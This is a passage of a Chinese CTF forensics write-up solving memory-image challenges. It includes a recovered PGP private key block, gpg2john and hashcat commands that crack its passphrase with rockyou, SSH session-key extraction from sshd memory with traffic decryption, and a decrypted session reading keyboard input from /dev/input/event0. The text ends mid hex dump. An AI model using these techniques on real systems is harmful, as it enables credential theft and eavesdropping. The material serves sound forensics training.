Forensics类别 AK 师傅们TQL (应该是第一支AK的队伍),现将师傅们的writeup整理如下,供给大家学习与进步,另外持续招新,简历请[email protected]
linux内存取证,先获取到内存镜像对应的版本然后制作profile
制作完成便可开始取证,主要是看一眼命令行内容
可以看到对Cirt.pdf用gpg进行加密后删掉了原文件,所以现在要做的就是找到相应的加密后的文件以及私钥和密码,可以直接strings寻找
可以看到他把加密后的文件上传到了https://ufile.io/fetnsp24 于是可以访问并下载到加密后的Cirt.pdf 私钥也可以直接在内存里找PGP PRIVATE KEY
-----BEGIN PGP PRIVATE KEY BLOCK-----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
IDcufsWUUAptvV8PmQ==
=LIOj
-----END PGP PRIVATE KEY BLOCK-----
现在私钥密文都有了,还缺个密码 这里可以使用gpg2john结合hashcat使用rockyou进行爆破
gpg2john 1.txt > hash.txt
hashcat -m 17010 hash.txt -a 0 ./webtools/rockyou.txt --force
得到密码itachi 需要的都已经拿到了,直接解密即可
解密出来的pdf里拿到url https://pastebin.com/5Zh86iu6 访问即可拿到flag --> idek{[email protected]_1n_m3m0rY}
还是先做profile,这里做5.10.0-11的
做好后查看命令行记录
可以发现他先是进行了键盘记录的读取然后把Confidential.7z上传后删掉了,并且还抓取了全过程的流量包 分析一下流量就可以看到被传输的压缩包,先用wireshark直接导出,但是直接导出的压缩包文件格式是错误的 通过阅读netascii传输模式对传输数据的处理方法https://en.wikipedia.org/wiki/Trivial_File_Transfer_Protocol
Netascii is a modified form of ASCII, defined in RFC 764. It consists of an 8-bit extension of the 7-bit ASCII character space from 0x20 to 0x7F (the printable characters and the space) and eight of the control characters. The allowed control characters include the null (0x00), the line feed (LF, 0x0A), and the carriage return (CR, 0x0D). Netascii also requires that the end of line marker on a host be translated to the character pair CR LF for transmission, and that any CR must be followed by either a LF or the null.
可以知道在传输过程中对于0x0d和0x0a都会进行替换,所以只要换回来即可恢复正常压缩包
data = open('Confidential.7z', 'rb').read()
data = data.replace(b'\x0d\x0a', b'\x0a').replace(b'\x0d\x00', b'\x0d')
open('out.7z', 'wb').write(data)
这时候压缩包就可以被正常打开了,但是需要密码 根据提示密码没有大写字母,猜测压缩包密码需要从键盘记录里获取,也就是event0的内容 同时注意到压缩包里有很多ssh流量,于是从内存里提取密钥并尝试解密ssh 这里要用到一个vol2的插件https://github.com/fox-it/OpenSSH-Session-Key-Recovery 然后查看进程找到ssh对应的Pid为2732
然后利用这个插件提取密钥
再将其写入json文件
{"task_name": "sshd", "sshenc_addr": 94122048527088, "cipher_name": "[email protected]", "key": "895688678410a0b9b358b0b04ab909d49333791e864c89593c66d5ce5083b8e5", "iv": "40e87818bef3d68c45c9a9f5"}
{"task_name": "sshd", "sshenc_addr": 94122048527408, "cipher_name": "[email protected]", "key": "f03b9e6c1b37ec53d89839e85deffb204d9a261076014850399499e913a1b32b", "iv": "dc972db4e5f7e8738ddf57d6"}
然后使用工具https://github.com/fox-it/OpenSSH-Network-Parser即可解密
network-parser -p Stealth.pcapng --popt keyfile=key.json --proto ssh -o dump/
(安装过程遇到问题可以看看这篇文章https://blog.csdn.net/onl_llo/article/details/119994561?spm=1001.2014.3001.5501 得到以下内容
Warning: stream not in closed state!
[192.168.25.1:56174 -> 192.168.25.128:22 2023-01-12 06:07:53.487476 - 2023-01-12 06:11:20.223402]
[User Auth Request]
username: 'debian'
service_name: 'ssh-connection'
method_name: 'password'
Password: debianLinux debian11 5.10.0-11-amd64 #1 SMP Debian 5.10.92-2 (2022-02-28) x86_64
Last login: Tue Aug 17 05:13:01 2021 from 192.168.1.1
[?2004h]0;[email protected]: ~[email protected]:~$
w
w
h
h
o
o
a
a
m
m
i
i
[?2004l
debian
[?2004h
]0;[email protected]: ~[email protected]:~$
l
l
s
s
/
/
e
e
[K
d
d
e
e
v
v
/
/
i
i
n
n
p
p
ut/
[?2004l
[0m[01;34mby-id[0m [40;33;01mevent0[0m [40;33;01mevent2[0m [40;33;01mevent4[0m [40;33;01mevent6[0m [40;33;01mmice[0m [40;33;01mmouse1[0m [40;33;01mmouse3[0m
[01;34mby-path[0m [40;33;01mevent1[0m [40;33;01mevent3[0m [40;33;01mevent5[0m [40;33;01mjs0[0m [40;33;01mmouse0[0m [40;33;01mmouse2[0m
[?2004h]0;[email protected]: ~[email protected]:~$
c
c
a
a
t
t
/
/
d
d
e
e
v
v
/
/
/
i
i
n
n
p
p
ut/
e
e
v
v
e
e
nt
0
0
|
|
x
x
x
x
d
d
-
-
p
p
[?2004l
cat: /dev//input/event0: Permission denied
[?2004h]0;[email protected]: ~[email protected]:~$
[A
cat /dev//input/event0 | xxd -p
[H
s
[[email protected]
u
[[email protected]
d
[[email protected]
o
[[email protected]
[1@
[C
[C
[C
[C
[C
[C
[C
[C
[C
[C
[C
[C
[C
[C
[C
[C
[C
[C
[1P
[?2004l
daa3bf63000000002b3b030000000000040004001e000000daa3bf630000
00002b3b03000000000001001e0001000000daa3bf63000000002b3b0300
000000000000000000000000daa3bf630000000091e10400000000000400
04001e000000daa3bf630000000091e104000000000001001e0000000000
daa3bf630000000091e10400000000000000000000000000daa3bf630000
000021660800000000000400040013000000daa3bf630000000021660800
000000000100130001000000daa3bf630000000021660800000000000000
000000000000daa3bf6300000000aaf70900000000000400040013000000
daa3bf6300000000aaf70900000000000100130000000000daa3bf630000
0000aaf70900000000000000000000000000daa3bf630000000052a80c00
00000000040004002e000000daa3bf630000000052a80c00000000000100
2e0001000000daa3bf630000000052a80c00000000000000000000000000
daa3bf6300000000d4ee0e0000000000040004002e000000daa3bf630000
0000d4ee0e000000000001002e0000000000daa3bf6300000000d4ee0e00
000000000000000000000000dba3bf6300000000dc5a0000000000000400
040023000000dba3bf6300000000dc5a0000000000000100230001000000
dba3bf6300000000dc5a0000000000000000000000000000dba3bf630000
0000d5f60100000000000400040017000000dba3bf6300000000d5f60100
000000000100170001000000dba3bf6300000000d5f60100000000000000
000000000000dba3bf6300000000dcf30200000000000400040023000000
dba3bf6300000000dcf30200000000000100230000000000dba3bf630000
0000dcf30200000000000000000000000000dba3bf63000000005e400300
00000000040004002f000000dba3bf63000000005e400300000000000100
2f0001000000dba3bf63000000005e400300000000000000000000000000
dba3bf6300000000f9410400000000000400040017000000dba3bf630000
0000f9410400000000000100170000000000dba3bf6300000000f9410400
000000000000000000000000dba3bf63000000001a450400000000000400
040012000000dba3bf63000000001a450400000000000100120001000000
dba3bf63000000001a450400000000000000000000000000dba3bf630000
000043ea040000000000040004002f000000dba3bf630000000043ea0400
0000000001002f0000000000dba3bf630000000043ea0400000000000000
000000000000dba3bf630000000070e30500000000000400040039000000
dba3bf630000000070e30500000000000100390001000000dba3bf630000
000070e30500000000000000000000000000dba3bf6300000000727d0700
000000000400040012000000dba3bf6300000000727d0700000000000100
120000000000dba3bf6300000000727d0700000000000000000000000000
dba3bf630000000058c60800000000000400040039000000dba3bf630000
000058c60800000000000100390000000000dba3bf630000000058c60800
000000000000000000000000dba3bf63000000004a540a00000000000400
040032000000dba3bf63000000004a540a00000000000100320001000000
dba3bf63000000004a540a00000000000000000000000000dba3bf630000
000076470c00000000000400040032000000dba3bf630000000076470c00
000000000100320000000000dba3bf630000000076470c00000000000000
000000000000dba3bf6300000000d6720d0000000000040004001e000000
dba3bf6300000000d6720d000000000001001e0001000000dba3bf630000
0000d6720d00000000000000000000000000dba3bf6300000000d01d0f00
00000000040004001e000000dba3bf6300000000d01d0f00000000000100
1e0000000000dba3bf6300000000d01d0f00000000000000000000000000
dca3bf630000000018520100000000000400040031000000dca3bf630000
000018520100000000000100310001000000dca3bf630000000018520100
000000000000000000000000dca3bf6300000000f93b0300000000000400
040031000000dca3bf6300000000f93b0300000000000100310000000000
dca3bf6300000000f93b0300000000000000000000000000dca3bf630000
00003dc8050000000000040004001e000000dca3bf63000000003dc80500
0000000001001e0001000000dca3bf63000000003dc80500000000000000
000000000000dca3bf6300000000b45d070000000000040004001e000000
dca3bf6300000000b45d07000000000001001e0000000000dca3bf630000
0000b45d0700000000000000000000000000dca3bf630000000021850900
000000000400040022000000dca3bf630000000021850900000000000100
220001000000dca3bf630000000021850900000000000000000000000000
dca3bf630000000015780b00000000000400040022000000dca3bf630000
000015780b00000000000100220000000000dca3bf630000000015780b00
000000000000000000000000dca3bf63000000004cc50b00000000000400
040012000000dca3bf63000000004cc50b00000000000100120001000000
dca3bf63000000004cc50b00000000000000000000000000dca3bf630000
00005a590e00000000000400040013000000dca3bf63000000005a590e00
000000000100130001000000dca3bf63000000005a590e00000000000000
000000000000dca3bf6300000000efb20e00000000000400040012000000
dca3bf6300000000efb20e00000000000100120000000000dca3bf630000
0000efb20e00000000000000000000000000dda3bf6300000000a8040100
000000000400040013000000dda3bf6300000000a8040100000000000100
130000000000dda3bf6300000000a8040100000000000000000000000000
dda3bf6300000000b2e2050000000000040004001c000000dda3bf630000
0000b2e205000000000001001c0001000000dda3bf6300000000b2e20500
000000000000000000000000dda3bf6300000000a37d0700000000000400
04001c000000dda3bf6300000000a37d07000000000001001c0000000000
dda3bf6300000000a37d0700000000000000000000000000e1a3bf630000
00009bf5080000000000040004002a000000e1a3bf63000000009bf50800
0000000001002a0001000000e1a3bf63000000009bf50800000000000000
000000000000e1a3bf630000000013690c0000000000040004002e000000
e1a3bf630000000013690c000000000001002e0001000000e1a3bf630000
000013690c00000000000000000000000000e1a3bf6300000000886c0d00
00000000040004002a000000e1a3bf6300000000886c0d00000000000100
2a0000000000e1a3bf6300000000886c0d00000000000000000000000000
e1a3bf6300000000f4660e0000000000040004002e000000e1a3bf630000
0000f4660e000000000001002e0000000000e1a3bf6300000000f4660e00
000000000000000000000000e2a3bf6300000000bf110200000000000400
040018000000e2a3bf6300000000bf110200000000000100180001000000
e2a3bf6300000000bf110200000000000000000000000000e2a3bf630000
000072b40300000000000400040018000000e2a3bf630000000072b40300
000000000100180000000000e2a3bf630000000072b40300000000000000
000000000000e2a3bf630000000002040500000000000400040031000000
e2a3bf630000000002040500000000000100310001000000e2a3bf630000
000002040500000000000000000000000000e2a3bf6300000000934d0600
000000000400040031000000e2a3bf6300000000934d0600000000000100
310000000000e2a3bf6300000000934d0600000000000000000000000000
e2a3bf6300000000ee610800000000000400040021000000e2a3bf630000
0000ee610800000000000100210001000000e2a3bf6300000000ee610800
000000000000000000000000e2a3bf630000000090500a00000000000400
040021000000e2a3bf630000000090500a00000000000100210000000000
e2a3bf630000000090500a00000000000000000000000000e2a3bf630000
0000dba00a00000000000400040017000000e2a3bf6300000000dba00a00
000000000100170001000000e2a3bf6300000000dba00a00000000000000
000000000000e2a3bf6300000000204c0c00000000000400040017000000
e2a3bf6300000000204c0c00000000000100170000000000e2a3bf630000
0000204c0c00000000000000000000000000e3a3bf6300000000a5490000
000000000400040020000000e3a3bf6300000000a5490000000000000100
200001000000e3a3bf6300000000a5490000000000000000000000000000
e3a3bf630000000079970100000000000400040012000000e3a3bf630000
000079970100000000000100120001000000e3a3bf630000000079970100
000000000000000000000000e3a3bf63000000003f930200000000000400
040020000000e3a3bf63000000003f930200000000000100200000000000
e3a3bf63000000003f930200000000000000000000000000e3a3bf630000
0000e5d80300000000000400040012000000e3a3bf6300000000e5d80300
000000000100120000000000e3a3bf6300000000e5d80300000000000000
000000000000e3a3bf63000000007c900400000000000400040031000000
e3a3bf63000000007c900400000000000100310001000000e3a3bf630000
00007c900400000000000000000000000000e3a3bf63000000009c760600
000000000400040031000000e3a3bf63000000009c760600000000000100
310000000000e3a3bf63000000009c760600000000000000000000000000
e3a3bf6300000000ebe00700000000000400040014000000e3a3bf630000
0000ebe00700000000000100140001000000e3a3bf6300000000ebe00700
000000000000000000000000e3a3bf63000000001a730900000000000400
040014000000e3a3bf63000000001a730900000000000100140000000000
e3a3bf63000000001a730900000000000000000000000000e3a3bf630000
00004a070a00000000000400040017000000e3a3bf63000000004a070a00
000000000100170001000000e3a3bf63000000004a070a00000000000000
000000000000e3a3bf6300000000ce5a0b00000000000400040017000000
e3a3bf6300000000ce5a0b00000000000100170000000000e3a3bf630000
0000ce5a0b00000000000000000000000000e3a3bf630000000088b10b00
00000000040004001e000000e3a3bf630000000088b10b00000000000100
1e0001000000e3a3bf630000000088b10b00000000000000000000000000
e3a3bf630000000048530d0000000000040004001e000000e3a3bf630000
000048530d000000000001001e0000000000e3a3bf630000000048530d00
000000000000000000000000e3a3bf63000000003cbc0d00000000000400
040026000000e3a3bf63000000003cbc0d00000000000100260001000000
e3a3bf63000000003cbc0d00000000000000000000000000e3a3bf630000
0000f6020f00000000000400040026000000e3a3bf6300000000f6020f00
000000000100260000000000e3a3bf6300000000f6020f00000000000000
000000000000eda3bf63000000006e73080000000000040004001f000000
eda3bf63000000006e7308000000000001001f0001000000eda3bf630000
00006e730800000000000000000000000000eda3bf6300000000ae110a00
00000000040004001f000000eda3bf6300000000ae110a00000000000100
1f0000000000eda3bf6300000000ae110a00000000000000000000000000
eda3bf630000000067340e00000000000400040004000000eda3bf630000
000067340e00000000000100040001000000eda3bf630000000067340e00
000000000000000000000000eea3bf630000000033900000000000000400
040004000000eea3bf630000000033900000000000000100040000000000
eea3bf630000000033900000000000000000000000000000eea3bf630000
0000791d050000000000040004002e000000eea3bf6300000000791d0500
0000000001002e0001000000eea3bf6300000000791d0500000000000000
000000000000eea3bf63000000000f64070000000000040004002e000000
eea3bf63000000000f6407000000000001002e0000000000eea3bf630000
00000f640700000000000000000000000000f0a3bf630000000027090f00
000000000400040013000000f0a3bf630000000027090f00000000000100
130001000000f0a3bf630000000027090f00000000000000000000000000
f1a3bf63000000008eff0100000000000400040013000000f1a3bf630000
00008eff0100000000000100130000000000f1a3bf63000000008eff0100
000000000000000000000000f1a3bf63000000000b550300000000000400
040004000000f1a3bf63000000000b550300000000000100040001000000
f1a3bf63000000000b550300000000000000000000000000f1a3bf630000
000053f20400000000000400040004000000f1a3bf630000000053f20400
000000000100040000000000f1a3bf630000000053f20400000000000000
000000000000f1a3bf6300000000614e0700000000000400040014000000
f1a3bf6300000000614e0700000000000100140001000000f1a3bf630000
0000614e0700000000000000000000000000f1a3bf630000000003f10800
000000000400040014000000f1a3bf630000000003f10800000000000100
140000000000f1a3bf630000000003f10800000000000000000000000000
f3a3bf630000000022380400000000000400040008000000f3a3bf630000
000022380400000000000100080001000000f3a3bf630000000022380400
000000000000000000000000f3a3bf630000000030d00500000000000400
040008000000f3a3bf630000000030d00500000000000100080000000000
f3a3bf630000000030d00500000000000000000000000000f4a3bf630000
0000baf4030000000000040004001e000000f4a3bf6300000000baf40300
0000000001001e0001000000f4a3bf6300000000baf40300000000000000
000000000000f4a3bf6300000000d61f070000000000040004001e000000
f4a3bf6300000000d61f07000000000001001e0000000000f4a3bf630000
0000d61f0700000000000000000000000000f6a3bf6300000000131d0d00
00000000040004002c000000f6a3bf6300000000131d0d00000000000100
2c0001000000f6a3bf6300000000131d0d00000000000000000000000000
f6a3bf6300000000ef0c0f0000000000040004002c000000f6a3bf630000
0000ef0c0f000000000001002c0000000000f6a3bf6300000000ef0c0f00
000000000000000000000000f8a3bf630000000045f80700000000000400
0400cb000000f8a3bf630000000045f80700000000000100690001000000
f8a3bf630000000045f80700000000000000000000000000f8a3bf630000
0000333c0a000000000004000400cb000000f8a3bf6300000000333c0a00
000000000100690000000000f8a3bf6300000000333c0a00000000000000
000000000000f8a3bf6300000000aae70d0000000000040004000e000000
f8a3bf6300000000aae70d000000000001000e0001000000f8a3bf630000
0000aae70d00000000000000000000000000f8a3bf6300000000862f0f00
00000000040004000e000000f8a3bf6300000000862f0f00000000000100
0e0000000000f8a3bf6300000000862f0f00000000000000000000000000
f9a3bf630000000071a504000000000004000400cd000000f9a3bf630000
000071a504000000000001006a0001000000f9a3bf630000000071a50400
000000000000000000000000f9a3bf6300000000eb250700000000000400
0400cd000000f9a3bf6300000000eb2507000000000001006a0000000000
f9a3bf6300000000eb250700000000000000000000000000faa3bf630000
0000ed910000000000000400040019000000faa3bf6300000000ed910000
000000000100190001000000faa3bf6300000000ed910000000000000000
000000000000faa3bf630000000030390200000000000400040019000000
faa3bf630000000030390200000000000100190000000000faa3bf630000
000030390200000000000000000000000000faa3bf6300000000568e0d00
00000000040004002a000000faa3bf6300000000568e0d00000000000100
2a0001000000faa3bf6300000000568e0d00000000000000000000000000
faa3bf630000000074270f00000000000400040003000000faa3bf630000
000074270f00000000000100030001000000faa3bf630000000074270f00
000000000000000000000000fba3bf6300000000a97b0100000000000400
04002a000000fba3bf6300000000a97b01000000000001002a0000000000
fba3bf6300000000a97b0100000000000000000000000000fba3bf630000
00005a1d0300000000000400040003000000fba3bf63000000005a1d0300
000000000100030000000000fba3bf63000000005a1d0300000000000000
000000000000fda3bf6300000000a6010900000000000400040006000000
fda3bf6300000000a6010900000000000100060001000000fda3bf630000
0000a6010900000000000000000000000000fda3bf6300000000df3d0b00
000000000400040006000000fda3bf6300000000df3d0b00000000000100
060000000000fda3bf6300000000df3d0b00000000000000000000000000
fea3bf630000000063e107000000000004000400cb000000fea3bf630000
000063e10700000000000100690001000000fea3bf630000000063e10700
000000000000000000000000fea3bf6300000000711f0a00000000000400
0400cb000000fea3bf6300000000711f0a00000000000100690000000000
fea3bf6300000000711f0a00000000000000000000000000fea3bf630000
0000c38a0c0000000000040004001f000000fea3bf6300000000c38a0c00
0000000001001f0001000000fea3bf6300000000c38a0c00000000000000
000000000000fea3bf63000000008dcf0e0000000000040004001f000000
fea3bf63000000008dcf0e000000000001001f0000000000fea3bf630000
00008dcf0e00000000000000000000000000ffa3bf630000000089de0100
0000000004000400cd000000ffa3bf630000000089de0100000000000100
6a0001000000ffa3bf630000000089de0100000000000000000000000000
ffa3bf63000000002bcd03000000000004000400cd000000ffa3bf630000
00002bcd03000000000001006a0000000000ffa3bf63000000002bcd0300
000000000000000000000000ffa3bf6300000000133b0800000000000400
04001f000000ffa3bf6300000000133b08000000000001001f0001000000
ffa3bf6300000000133b0800000000000000000000000000ffa3bf630000
0000c57f090000000000040004001f000000ffa3bf6300000000c57f0900
0000000001001f0000000000ffa3bf6300000000c57f0900000000000000
000000000000ffa3bf6300000000eeca0b000000000004000400cb000000
ffa3bf6300000000eeca0b00000000000100690001000000ffa3bf630000
0000eeca0b00000000000000000000000000ffa3bf63000000000dc90d00
0000000004000400cb000000ffa3bf63000000000dc90d00000000000100
690000000000ffa3bf63000000000dc90d00000000000000000000000000
00a4bf63000000007c8a030000000000040004000e00000000a4bf630000
00007c8a03000000000001000e000100000000a4bf63000000007c8a0300
00000000000000000000000000a4bf6300000000431e0500000000000400
04000e00000000a4bf6300000000431e05000000000001000e0000000000
00a4bf6300000000431e050000000000000000000000000000a4bf630000
000062fe08000000000004000400cd00000000a4bf630000000062fe0800
0000000001006a000100000000a4bf630000000062fe0800000000000000
00000000000000a4bf6300000000d9eb0a000000000004000400cd000000
00a4bf6300000000d9eb0a000000000001006a000000000000a4bf630000
0000d9eb0a0000000000000000000000000001a4bf6300000000d56d0400
00000000040004001100000001a4bf6300000000d56d0400000000000100
11000100000001a4bf6300000000d56d0400000000000000000000000000
01a4bf630000000044b5050000000000040004001100000001a4bf630000
000044b5050000000000010011000000000001a4bf630000000044b50500
00000000000000000000000005a4bf6300000000544f0300000000000400
04001300000005a4bf6300000000544f0300000000000100130001000000
05a4bf6300000000544f030000000000000000000000000005a4bf630000
0000d78f050000000000040004001300000005a4bf6300000000d78f0500
00000000010013000000000005a4bf6300000000d78f0500000000000000
00000000000005a4bf6300000000dea007000000000004000400cb000000
05a4bf6300000000dea0070000000000010069000100000005a4bf630000
0000dea0070000000000000000000000000005a4bf6300000000efdc0900
0000000004000400cb00000005a4bf6300000000efdc0900000000000100
69000000000005a4bf6300000000efdc0900000000000000000000000000
06a4bf6300000000967c010000000000040004000b00000006a4bf630000
0000967c01000000000001000b000100000006a4bf6300000000967c0100
00000000000000000000000006a4bf630000000037ca0200000000000400
04000b00000006a4bf630000000037ca02000000000001000b0000000000
06a4bf630000000037ca020000000000000000000000000006a4bf630000
000006e808000000000004000400cd00000006a4bf630000000006e80800
0000000001006a000100000006a4bf630000000006e80800000000000000
00000000000006a4bf63000000003a730b000000000004000400cd000000
06a4bf63000000003a730b000000000001006a000000000006a4bf630000
